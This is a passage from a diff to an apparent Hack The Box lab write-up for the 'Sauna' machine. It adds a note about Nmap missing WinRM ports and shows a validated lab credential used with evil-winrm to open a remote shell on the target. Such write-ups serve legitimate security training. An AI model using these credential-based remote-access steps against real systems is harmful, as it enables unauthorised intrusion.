axcheron/axcheron.github.io/_htb/02_writeup_sauna.md

 WINRM       10.129.95.180   5985   10.129.95.180    [+] egotistical-bank.local\fsmith:Thestrokes23 (Pwn3d!)
 ```

+**Note:** The WinRM ports (5985/TCP and 5986/TCP) didn't show up while scanning the machine, but they are actually open.
+Again, this is due to the fact that, by default, Nmap only scans the 1000 most common TCP ports and WinRM ports are probably not part of them.
+{: .notice--info}

 The password is valid and we do have a WinRM access to the remote computer.
 Using [Evil-WinRM](https://github.com/Hackplayers/evil-winrm) and the recovered account, we can try to connect to the remote machine.

 ```bash
 $ evil-winrm -i 10.129.95.180 -u fsmith -p Thestrokes23
 Evil-WinRM shell v3.3
 Info: Establishing connection to remote endpoint